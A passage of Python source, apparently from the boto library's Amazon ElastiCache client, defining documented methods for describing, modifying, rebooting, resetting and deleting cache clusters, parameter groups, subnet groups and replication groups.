action='DeleteCacheSecurityGroup',
verb='POST',
path='/', params=params)
def delete_cache_subnet_group(self, cache_subnet_group_name):
"""
The DeleteCacheSubnetGroup operation deletes a cache subnet
group.
You cannot delete a cache subnet group if it is associated
with any cache clusters.
:type cache_subnet_group_name: string
:param cache_subnet_group_name: The name of the cache subnet group to
delete.
Constraints: Must contain no more than 255 alphanumeric characters or
hyphens.
"""
params = {'CacheSubnetGroupName': cache_subnet_group_name, }
return self._make_request(
action='DeleteCacheSubnetGroup',
verb='POST',
path='/', params=params)
def delete_replication_group(self, replication_group_id):
"""
The DeleteReplicationGroup operation deletes an existing
replication group. DeleteReplicationGroup deletes the primary
cache cluster and all of the read replicas in the replication
group. When you receive a successful response from this
operation, Amazon ElastiCache immediately begins deleting the
entire replication group; you cannot cancel or revert this
operation.
:type replication_group_id: string
:param replication_group_id: The identifier for the replication group
to be deleted. This parameter is not case sensitive.
"""
params = {'ReplicationGroupId': replication_group_id, }
return self._make_request(
action='DeleteReplicationGroup',
verb='POST',
path='/', params=params)
def describe_cache_clusters(self, cache_cluster_id=None,
max_records=None, marker=None,
show_cache_node_info=None):
"""
The DescribeCacheClusters operation returns information about
all provisioned cache clusters if no cache cluster identifier
is specified, or about a specific cache cluster if a cache
cluster identifier is supplied.
By default, abbreviated information about the cache
        cluster(s) will be returned. You can use the optional
ShowDetails flag to retrieve detailed information about the
cache nodes associated with the cache clusters. These details
include the DNS address and port for the cache node endpoint.
If the cluster is in the CREATING state, only cluster level
information will be displayed until all of the nodes are
successfully provisioned.
If the cluster is in the DELETING state, only cluster level
information will be displayed.
If cache nodes are currently being added to the cache cluster,
node endpoint information and creation time for the additional
nodes will not be displayed until they are completely
provisioned. When the cache cluster state is available , the
cluster is ready for use.
If cache nodes are currently being removed from the cache
cluster, no endpoint information for the removed nodes is
displayed.
:type cache_cluster_id: string
:param cache_cluster_id: The user-supplied cluster identifier. If this
parameter is specified, only information about that specific cache
cluster is returned. This parameter isn't case sensitive.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
:type show_cache_node_info: boolean
:param show_cache_node_info: An optional flag that can be included in
the DescribeCacheCluster request to retrieve information about the
individual cache nodes.
"""
params = {}
if cache_cluster_id is not None:
params['CacheClusterId'] = cache_cluster_id
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
if show_cache_node_info is not None:
params['ShowCacheNodeInfo'] = str(
show_cache_node_info).lower()
return self._make_request(
action='DescribeCacheClusters',
verb='POST',
path='/', params=params)
def describe_cache_engine_versions(self, engine=None,
engine_version=None,
cache_parameter_group_family=None,
max_records=None, marker=None,
default_only=None):
"""
The DescribeCacheEngineVersions operation returns a list of
the available cache engines and their versions.
:type engine: string
:param engine: The cache engine to return. Valid values: `memcached` |
`redis`
:type engine_version: string
:param engine_version: The cache engine version to return.
Example: `1.4.14`
:type cache_parameter_group_family: string
:param cache_parameter_group_family:
The name of a specific cache parameter group family to return details
for.
Constraints:
+ Must be 1 to 255 alphanumeric characters
+ First character must be a letter
+ Cannot end with a hyphen or contain two consecutive hyphens
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
:type default_only: boolean
:param default_only: If true , specifies that only the default version
of the specified engine or engine and major version combination is
to be returned.
"""
params = {}
if engine is not None:
params['Engine'] = engine
if engine_version is not None:
params['EngineVersion'] = engine_version
if cache_parameter_group_family is not None:
params['CacheParameterGroupFamily'] = cache_parameter_group_family
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
if default_only is not None:
params['DefaultOnly'] = str(
default_only).lower()
return self._make_request(
action='DescribeCacheEngineVersions',
verb='POST',
path='/', params=params)
def describe_cache_parameter_groups(self,
cache_parameter_group_name=None,
max_records=None, marker=None):
"""
The DescribeCacheParameterGroups operation returns a list of
cache parameter group descriptions. If a cache parameter group
name is specified, the list will contain only the descriptions
for that group.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of a specific cache
parameter group to return details for.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {}
if cache_parameter_group_name is not None:
params['CacheParameterGroupName'] = cache_parameter_group_name
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeCacheParameterGroups',
verb='POST',
path='/', params=params)
def describe_cache_parameters(self, cache_parameter_group_name,
source=None, max_records=None, marker=None):
"""
The DescribeCacheParameters operation returns the detailed
parameter list for a particular cache parameter group.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of a specific cache
parameter group to return details for.
:type source: string
:param source: The parameter types to return.
Valid values: `user` | `system` | `engine-default`
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
}
if source is not None:
params['Source'] = source
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeCacheParameters',
verb='POST',
path='/', params=params)
def describe_cache_security_groups(self, cache_security_group_name=None,
max_records=None, marker=None):
"""
The DescribeCacheSecurityGroups operation returns a list of
cache security group descriptions. If a cache security group
name is specified, the list will contain only the description
of that group.
:type cache_security_group_name: string
:param cache_security_group_name: The name of the cache security group
to return details for.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
            the marker, up to the value specified by MaxRecords.
"""
params = {}
if cache_security_group_name is not None:
params['CacheSecurityGroupName'] = cache_security_group_name
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeCacheSecurityGroups',
verb='POST',
path='/', params=params)
def describe_cache_subnet_groups(self, cache_subnet_group_name=None,
max_records=None, marker=None):
"""
The DescribeCacheSubnetGroups operation returns a list of
cache subnet group descriptions. If a subnet group name is
specified, the list will contain only the description of that
group.
:type cache_subnet_group_name: string
:param cache_subnet_group_name: The name of the cache subnet group to
return details for.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
            the marker, up to the value specified by MaxRecords.
"""
params = {}
if cache_subnet_group_name is not None:
params['CacheSubnetGroupName'] = cache_subnet_group_name
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeCacheSubnetGroups',
verb='POST',
path='/', params=params)
def describe_engine_default_parameters(self,
cache_parameter_group_family,
max_records=None, marker=None):
"""
The DescribeEngineDefaultParameters operation returns the
default engine and system parameter information for the
specified cache engine.
:type cache_parameter_group_family: string
:param cache_parameter_group_family: The name of the cache parameter
group family. Valid values are: `memcached1.4` | `redis2.6`
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
            the marker, up to the value specified by MaxRecords.
"""
params = {
'CacheParameterGroupFamily': cache_parameter_group_family,
}
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeEngineDefaultParameters',
verb='POST',
path='/', params=params)
def describe_events(self, source_identifier=None, source_type=None,
start_time=None, end_time=None, duration=None,
max_records=None, marker=None):
"""
The DescribeEvents operation returns events related to cache
clusters, cache security groups, and cache parameter groups.
You can obtain events specific to a particular cache cluster,
cache security group, or cache parameter group by providing
the name as a parameter.
By default, only the events occurring within the last hour are
returned; however, you can retrieve up to 14 days' worth of
events if necessary.
:type source_identifier: string
:param source_identifier: The identifier of the event source for which
events will be returned. If not specified, then all sources are
included in the response.
:type source_type: string
:param source_type: The event source to retrieve events for. If no
value is specified, all events are returned.
        Valid values are: `cache-cluster` | `cache-parameter-group` |
            `cache-security-group` | `cache-subnet-group`
:type start_time: timestamp
:param start_time: The beginning of the time interval to retrieve
events for, specified in ISO 8601 format.
:type end_time: timestamp
:param end_time: The end of the time interval for which to retrieve
events, specified in ISO 8601 format.
:type duration: integer
:param duration: The number of minutes' worth of events to retrieve.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
            the marker, up to the value specified by MaxRecords.
"""
params = {}
if source_identifier is not None:
params['SourceIdentifier'] = source_identifier
if source_type is not None:
params['SourceType'] = source_type
if start_time is not None:
params['StartTime'] = start_time
if end_time is not None:
params['EndTime'] = end_time
if duration is not None:
params['Duration'] = duration
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeEvents',
verb='POST',
path='/', params=params)
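    # Usage sketch (illustrative; `conn` is an assumed connection instance):
    # pull the last 24 hours of events for a single cache cluster rather than
    # the default one-hour window. `duration` is expressed in minutes.
    #
    #     resp = conn.describe_events(source_identifier='my-cluster',
    #                                 source_type='cache-cluster',
    #                                 duration=24 * 60)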
def describe_replication_groups(self, replication_group_id=None,
max_records=None, marker=None):
"""
The DescribeReplicationGroups operation returns information
about a particular replication group. If no identifier is
specified, DescribeReplicationGroups returns information about
all replication groups.
:type replication_group_id: string
:param replication_group_id: The identifier for the replication group
to be described. This parameter is not case sensitive.
If you do not specify this parameter, information about all replication
groups is returned.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
            the marker, up to the value specified by MaxRecords.
"""
params = {}
if replication_group_id is not None:
params['ReplicationGroupId'] = replication_group_id
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeReplicationGroups',
verb='POST',
path='/', params=params)
def describe_reserved_cache_nodes(self, reserved_cache_node_id=None,
reserved_cache_nodes_offering_id=None,
cache_node_type=None, duration=None,
product_description=None,
offering_type=None, max_records=None,
marker=None):
"""
The DescribeReservedCacheNodes operation returns information
about reserved cache nodes for this account, or about a
specified reserved cache node.
:type reserved_cache_node_id: string
:param reserved_cache_node_id: The reserved cache node identifier
filter value. Use this parameter to show only the reservation that
matches the specified reservation ID.
:type reserved_cache_nodes_offering_id: string
:param reserved_cache_nodes_offering_id: The offering identifier filter
value. Use this parameter to show only purchased reservations
matching the specified offering identifier.
:type cache_node_type: string
:param cache_node_type: The cache node type filter value. Use this
parameter to show only those reservations matching the specified
cache node type.
:type duration: string
:param duration: The duration filter value, specified in years or
seconds. Use this parameter to show only reservations for this
duration.
Valid Values: `1 | 3 | 31536000 | 94608000`
:type product_description: string
:param product_description: The product description filter value. Use
this parameter to show only those reservations matching the
specified product description.
:type offering_type: string
:param offering_type: The offering type filter value. Use this
parameter to show only the available offerings matching the
specified offering type.
Valid values: `"Light Utilization" | "Medium Utilization" | "Heavy
            Utilization"`
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
            the marker, up to the value specified by MaxRecords.
"""
params = {}
if reserved_cache_node_id is not None:
params['ReservedCacheNodeId'] = reserved_cache_node_id
if reserved_cache_nodes_offering_id is not None:
params['ReservedCacheNodesOfferingId'] = reserved_cache_nodes_offering_id
if cache_node_type is not None:
params['CacheNodeType'] = cache_node_type
if duration is not None:
params['Duration'] = duration
if product_description is not None:
params['ProductDescription'] = product_description
if offering_type is not None:
params['OfferingType'] = offering_type
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeReservedCacheNodes',
verb='POST',
path='/', params=params)
def describe_reserved_cache_nodes_offerings(self,
reserved_cache_nodes_offering_id=None,
cache_node_type=None,
duration=None,
product_description=None,
offering_type=None,
max_records=None,
marker=None):
"""
The DescribeReservedCacheNodesOfferings operation lists
available reserved cache node offerings.
:type reserved_cache_nodes_offering_id: string
:param reserved_cache_nodes_offering_id: The offering identifier filter
value. Use this parameter to show only the available offering that
matches the specified reservation identifier.
Example: `438012d3-4052-4cc7-b2e3-8d3372e0e706`
:type cache_node_type: string
:param cache_node_type: The cache node type filter value. Use this
parameter to show only the available offerings matching the
specified cache node type.
:type duration: string
:param duration: Duration filter value, specified in years or seconds.
Use this parameter to show only reservations for a given duration.
Valid Values: `1 | 3 | 31536000 | 94608000`
:type product_description: string
:param product_description: The product description filter value. Use
this parameter to show only the available offerings matching the
specified product description.
:type offering_type: string
:param offering_type: The offering type filter value. Use this
parameter to show only the available offerings matching the
specified offering type.
Valid Values: `"Light Utilization" | "Medium Utilization" | "Heavy
            Utilization"`
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
            the marker, up to the value specified by MaxRecords.
"""
params = {}
if reserved_cache_nodes_offering_id is not None:
params['ReservedCacheNodesOfferingId'] = reserved_cache_nodes_offering_id
if cache_node_type is not None:
params['CacheNodeType'] = cache_node_type
if duration is not None:
params['Duration'] = duration
if product_description is not None:
params['ProductDescription'] = product_description
if offering_type is not None:
params['OfferingType'] = offering_type
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeReservedCacheNodesOfferings',
verb='POST',
path='/', params=params)
def modify_cache_cluster(self, cache_cluster_id, num_cache_nodes=None,
cache_node_ids_to_remove=None,
cache_security_group_names=None,
security_group_ids=None,
preferred_maintenance_window=None,
notification_topic_arn=None,
cache_parameter_group_name=None,
notification_topic_status=None,
apply_immediately=None, engine_version=None,
auto_minor_version_upgrade=None):
"""
The ModifyCacheCluster operation modifies the settings for a
cache cluster. You can use this operation to change one or
more cluster configuration parameters by specifying the
parameters and the new values.
:type cache_cluster_id: string
:param cache_cluster_id: The cache cluster identifier. This value is
stored as a lowercase string.
:type num_cache_nodes: integer
:param num_cache_nodes: The number of cache nodes that the cache
cluster should have. If the value for NumCacheNodes is greater than
the existing number of cache nodes, then more nodes will be added.
If the value is less than the existing number of cache nodes, then
cache nodes will be removed.
If you are removing cache nodes, you must use the CacheNodeIdsToRemove
parameter to provide the IDs of the specific cache nodes to be
removed.
:type cache_node_ids_to_remove: list
:param cache_node_ids_to_remove: A list of cache node IDs to be
removed. A node ID is a numeric identifier (0001, 0002, etc.). This
parameter is only valid when NumCacheNodes is less than the
existing number of cache nodes. The number of cache node IDs
supplied in this parameter must match the difference between the
existing number of cache nodes in the cluster and the value of
NumCacheNodes in the request.
:type cache_security_group_names: list
:param cache_security_group_names: A list of cache security group names
to authorize on this cache cluster. This change is asynchronously
applied as soon as possible.
This parameter can be used only with clusters that are created outside
of an Amazon Virtual Private Cloud (VPC).
Constraints: Must contain no more than 255 alphanumeric characters.
Must not be "Default".
:type security_group_ids: list
:param security_group_ids: Specifies the VPC Security Groups associated
with the cache cluster.
This parameter can be used only with clusters that are created in an
Amazon Virtual Private Cloud (VPC).
:type preferred_maintenance_window: string
:param preferred_maintenance_window: The weekly time range (in UTC)
during which system maintenance can occur. Note that system
maintenance may result in an outage. This change is made
immediately. If you are moving this window to the current time,
there must be at least 120 minutes between the current time and end
of the window to ensure that pending changes are applied.
:type notification_topic_arn: string
:param notification_topic_arn:
The Amazon Resource Name (ARN) of the SNS topic to which notifications
will be sent.
        The SNS topic owner must be the same as the cache cluster owner.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to apply to this cache cluster. This change is asynchronously
applied as soon as possible for parameters when the
ApplyImmediately parameter is specified as true for this request.
:type notification_topic_status: string
:param notification_topic_status: The status of the Amazon SNS
notification topic. Notifications are sent only if the status is
            active.
Valid values: `active` | `inactive`
:type apply_immediately: boolean
:param apply_immediately: If `True`, this parameter causes the
modifications in this request and any pending modifications to be
applied, asynchronously and as soon as possible, regardless of the
PreferredMaintenanceWindow setting for the cache cluster.
If `False`, then changes to the cache cluster are applied on the next
maintenance reboot, or the next failure reboot, whichever occurs
first.
Valid values: `True` | `False`
Default: `False`
:type engine_version: string
:param engine_version: The upgraded version of the cache engine to be
run on the cache cluster nodes.
:type auto_minor_version_upgrade: boolean
:param auto_minor_version_upgrade: If `True`, then minor engine
upgrades will be applied automatically to the cache cluster during
the maintenance window.
Valid values: `True` | `False`
Default: `True`
"""
params = {'CacheClusterId': cache_cluster_id, }
if num_cache_nodes is not None:
params['NumCacheNodes'] = num_cache_nodes
if cache_node_ids_to_remove is not None:
self.build_list_params(params,
cache_node_ids_to_remove,
'CacheNodeIdsToRemove.member')
if cache_security_group_names is not None:
self.build_list_params(params,
cache_security_group_names,
'CacheSecurityGroupNames.member')
if security_group_ids is not None:
self.build_list_params(params,
security_group_ids,
'SecurityGroupIds.member')
if preferred_maintenance_window is not None:
params['PreferredMaintenanceWindow'] = preferred_maintenance_window
if notification_topic_arn is not None:
params['NotificationTopicArn'] = notification_topic_arn
if cache_parameter_group_name is not None:
params['CacheParameterGroupName'] = cache_parameter_group_name
if notification_topic_status is not None:
params['NotificationTopicStatus'] = notification_topic_status
if apply_immediately is not None:
params['ApplyImmediately'] = str(
apply_immediately).lower()
if engine_version is not None:
params['EngineVersion'] = engine_version
if auto_minor_version_upgrade is not None:
params['AutoMinorVersionUpgrade'] = str(
auto_minor_version_upgrade).lower()
return self._make_request(
action='ModifyCacheCluster',
verb='POST',
path='/', params=params)
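    # Usage sketch (illustrative; `conn` and the identifiers are assumed):
    # shrink a three-node cluster to two nodes. Because the node count is
    # being reduced, the node ID being dropped must be listed explicitly, and
    # apply_immediately=True applies the change outside the maintenance
    # window.
    #
    #     conn.modify_cache_cluster('my-cluster',
    #                               num_cache_nodes=2,
    #                               cache_node_ids_to_remove=['0003'],
    #                               apply_immediately=True)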
def modify_cache_parameter_group(self, cache_parameter_group_name,
parameter_name_values):
"""
The ModifyCacheParameterGroup operation modifies the
parameters of a cache parameter group. You can modify up to 20
parameters in a single request by submitting a list parameter
name and value pairs.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to modify.
:type parameter_name_values: list
:param parameter_name_values: An array of parameter names and values
for the parameter update. You must supply at least one parameter
name and value; subsequent arguments are optional. A maximum of 20
parameters may be modified per request.
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
}
self.build_complex_list_params(
params, parameter_name_values,
'ParameterNameValues.member',
('ParameterName', 'ParameterValue'))
return self._make_request(
action='ModifyCacheParameterGroup',
verb='POST',
path='/', params=params)
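    # Usage sketch (illustrative; `conn`, the group name, and the parameter
    # names are assumed): build_complex_list_params maps each entry onto
    # ParameterName/ParameterValue members, so a list of (name, value) pairs
    # is the natural shape for `parameter_name_values`.
    #
    #     conn.modify_cache_parameter_group(
    #         'my-memcached-params',
    #         [('max_item_size', '10485760'),
    #          ('chunk_size_growth_factor', '1.05')])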
def modify_cache_subnet_group(self, cache_subnet_group_name,
cache_subnet_group_description=None,
subnet_ids=None):
"""
The ModifyCacheSubnetGroup operation modifies an existing
cache subnet group.
:type cache_subnet_group_name: string
:param cache_subnet_group_name: The name for the cache subnet group.
This value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters or
hyphens.
Example: `mysubnetgroup`
:type cache_subnet_group_description: string
:param cache_subnet_group_description: A description for the cache
subnet group.
:type subnet_ids: list
:param subnet_ids: The EC2 subnet IDs for the cache subnet group.
"""
params = {'CacheSubnetGroupName': cache_subnet_group_name, }
if cache_subnet_group_description is not None:
params['CacheSubnetGroupDescription'] = cache_subnet_group_description
if subnet_ids is not None:
self.build_list_params(params,
subnet_ids,
'SubnetIds.member')
return self._make_request(
action='ModifyCacheSubnetGroup',
verb='POST',
path='/', params=params)
def modify_replication_group(self, replication_group_id,
replication_group_description=None,
cache_security_group_names=None,
security_group_ids=None,
preferred_maintenance_window=None,
notification_topic_arn=None,
cache_parameter_group_name=None,
notification_topic_status=None,
apply_immediately=None, engine_version=None,
auto_minor_version_upgrade=None,
primary_cluster_id=None):
"""
The ModifyReplicationGroup operation modifies the settings for
a replication group.
:type replication_group_id: string
:param replication_group_id: The identifier of the replication group to
modify.
:type replication_group_description: string
:param replication_group_description: A description for the replication
group. Maximum length is 255 characters.
:type cache_security_group_names: list
:param cache_security_group_names: A list of cache security group names
to authorize for the clusters in this replication group. This
change is asynchronously applied as soon as possible.
This parameter can be used only with replication groups containing
cache clusters running outside of an Amazon Virtual Private Cloud
(VPC).
Constraints: Must contain no more than 255 alphanumeric characters.
Must not be "Default".
:type security_group_ids: list
:param security_group_ids: Specifies the VPC Security Groups associated
with the cache clusters in the replication group.
This parameter can be used only with replication groups containing
cache clusters running in an Amazon Virtual Private Cloud (VPC).
:type preferred_maintenance_window: string
:param preferred_maintenance_window: The weekly time range (in UTC)
during which replication group system maintenance can occur. Note
that system maintenance may result in an outage. This change is
made immediately. If you are moving this window to the current
time, there must be at least 120 minutes between the current time
and end of the window to ensure that pending changes are applied.
:type notification_topic_arn: string
:param notification_topic_arn:
The Amazon Resource Name (ARN) of the SNS topic to which notifications
will be sent.
        The SNS topic owner must be the same as the replication group owner.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to apply to all of the cache nodes in this replication group.
This change is asynchronously applied as soon as possible for
parameters when the ApplyImmediately parameter is specified as true
for this request.
:type notification_topic_status: string
:param notification_topic_status: The status of the Amazon SNS
notification topic for the replication group. Notifications are
            sent only if the status is active.
Valid values: `active` | `inactive`
:type apply_immediately: boolean
:param apply_immediately: If `True`, this parameter causes the
modifications in this request and any pending modifications to be
applied, asynchronously and as soon as possible, regardless of the
PreferredMaintenanceWindow setting for the replication group.
If `False`, then changes to the nodes in the replication group are
applied on the next maintenance reboot, or the next failure reboot,
whichever occurs first.
Valid values: `True` | `False`
Default: `False`
:type engine_version: string
:param engine_version: The upgraded version of the cache engine to be
            run on the nodes in the replication group.
:type auto_minor_version_upgrade: boolean
:param auto_minor_version_upgrade: Determines whether minor engine
upgrades will be applied automatically to all of the cache nodes in
the replication group during the maintenance window. A value of
`True` allows these upgrades to occur; `False` disables automatic
upgrades.
:type primary_cluster_id: string
:param primary_cluster_id: If this parameter is specified, ElastiCache
will promote each of the nodes in the specified cache cluster to
the primary role. The nodes of all other clusters in the
replication group will be read replicas.
"""
params = {'ReplicationGroupId': replication_group_id, }
if replication_group_description is not None:
params['ReplicationGroupDescription'] = replication_group_description
if cache_security_group_names is not None:
self.build_list_params(params,
cache_security_group_names,
'CacheSecurityGroupNames.member')
if security_group_ids is not None:
self.build_list_params(params,
security_group_ids,
'SecurityGroupIds.member')
if preferred_maintenance_window is not None:
params['PreferredMaintenanceWindow'] = preferred_maintenance_window
if notification_topic_arn is not None:
params['NotificationTopicArn'] = notification_topic_arn
if cache_parameter_group_name is not None:
params['CacheParameterGroupName'] = cache_parameter_group_name
if notification_topic_status is not None:
params['NotificationTopicStatus'] = notification_topic_status
if apply_immediately is not None:
params['ApplyImmediately'] = str(
apply_immediately).lower()
if engine_version is not None:
params['EngineVersion'] = engine_version
if auto_minor_version_upgrade is not None:
params['AutoMinorVersionUpgrade'] = str(
auto_minor_version_upgrade).lower()
if primary_cluster_id is not None:
params['PrimaryClusterId'] = primary_cluster_id
return self._make_request(
action='ModifyReplicationGroup',
verb='POST',
path='/', params=params)
def purchase_reserved_cache_nodes_offering(self,
reserved_cache_nodes_offering_id,
reserved_cache_node_id=None,
cache_node_count=None):
"""
The PurchaseReservedCacheNodesOffering operation allows you to
purchase a reserved cache node offering.
:type reserved_cache_nodes_offering_id: string
:param reserved_cache_nodes_offering_id: The ID of the reserved cache
node offering to purchase.
Example: 438012d3-4052-4cc7-b2e3-8d3372e0e706
:type reserved_cache_node_id: string
:param reserved_cache_node_id: A customer-specified identifier to track
this reservation.
Example: myreservationID
:type cache_node_count: integer
:param cache_node_count: The number of cache node instances to reserve.
Default: `1`
"""
params = {
'ReservedCacheNodesOfferingId': reserved_cache_nodes_offering_id,
}
if reserved_cache_node_id is not None:
params['ReservedCacheNodeId'] = reserved_cache_node_id
if cache_node_count is not None:
params['CacheNodeCount'] = cache_node_count
return self._make_request(
action='PurchaseReservedCacheNodesOffering',
verb='POST',
path='/', params=params)
def reboot_cache_cluster(self, cache_cluster_id,
cache_node_ids_to_reboot):
"""
The RebootCacheCluster operation reboots some, or all, of the
cache cluster nodes within a provisioned cache cluster. This
API will apply any modified cache parameter groups to the
cache cluster. The reboot action takes place as soon as
possible, and results in a momentary outage to the cache
cluster. During the reboot, the cache cluster status is set to
REBOOTING.
The reboot causes the contents of the cache (for each cache
cluster node being rebooted) to be lost.
When the reboot is complete, a cache cluster event is created.
:type cache_cluster_id: string
:param cache_cluster_id: The cache cluster identifier. This parameter
is stored as a lowercase string.
:type cache_node_ids_to_reboot: list
:param cache_node_ids_to_reboot: A list of cache cluster node IDs to
reboot. A node ID is a numeric identifier (0001, 0002, etc.). To
reboot an entire cache cluster, specify all of the cache cluster
node IDs.
"""
params = {'CacheClusterId': cache_cluster_id, }
self.build_list_params(params,
cache_node_ids_to_reboot,
'CacheNodeIdsToReboot.member')
return self._make_request(
action='RebootCacheCluster',
verb='POST',
path='/', params=params)
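    # Usage sketch (illustrative; `conn` and the identifiers are assumed):
    # reboot an entire two-node cluster by naming every node ID.
    #
    #     conn.reboot_cache_cluster('my-cluster',
    #                               cache_node_ids_to_reboot=['0001', '0002'])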
def reset_cache_parameter_group(self, cache_parameter_group_name,
parameter_name_values,
reset_all_parameters=None):
"""
The ResetCacheParameterGroup operation modifies the parameters
of a cache parameter group to the engine or system default
value. You can reset specific parameters by submitting a list
of parameter names. To reset the entire cache parameter group,
specify the ResetAllParameters and CacheParameterGroupName
parameters.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to reset.
:type reset_all_parameters: boolean
        :param reset_all_parameters: If true, all parameters in the cache
            parameter group will be reset to default values. If false, no such
action occurs.
Valid values: `True` | `False`
:type parameter_name_values: list
:param parameter_name_values: An array of parameter names to be reset.
If you are not resetting the entire cache parameter group, you must
specify at least one parameter name.
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
}
self.build_complex_list_params(
params, parameter_name_values,
'ParameterNameValues.member',
('ParameterName', 'ParameterValue'))
if reset_all_parameters is not None:
params['ResetAllParameters'] = str(
reset_all_parameters).lower()
return self._make_request(
action='ResetCacheParameterGroup',
verb='POST',
path='/', params=params)
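    # Usage sketch (illustrative; `conn` and the group name are assumed):
    # reset every parameter in a group to its default value; no individual
    # parameter names are needed when reset_all_parameters is true.
    #
    #     conn.reset_cache_parameter_group('my-memcached-params',
    #                                      parameter_name_values=[],
    #                                      reset_all_parameters=True)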
def revoke_cache_security_group_ingress(self, cache_security_group_name,
ec2_security_group_name,
ec2_security_group_owner_id):
"""
The RevokeCacheSecurityGroupIngress operation revokes ingress
from a cache security group. Use this operation to disallow
access from an Amazon EC2 security group that had been
previously authorized.
:type cache_security_group_name: string
:param cache_security_group_name: The name of the cache security group
to revoke ingress from.
:type ec2_security_group_name: string
:param ec2_security_group_name: The name of the Amazon EC2 security
group to revoke access from.
:type ec2_security_group_owner_id: string
:param ec2_security_group_owner_id: The AWS account number of the
Amazon EC2 security group owner. Note that this is not the same
thing as an AWS access key ID - you must provide a valid AWS
account number for this parameter.
"""
params = {
'CacheSecurityGroupName': cache_security_group_name,
'EC2SecurityGroupName': ec2_security_group_name,
'EC2SecurityGroupOwnerId': ec2_security_group_owner_id,
}
return self._make_request(
action='RevokeCacheSecurityGroupIngress',
verb='POST',
path='/', params=params)
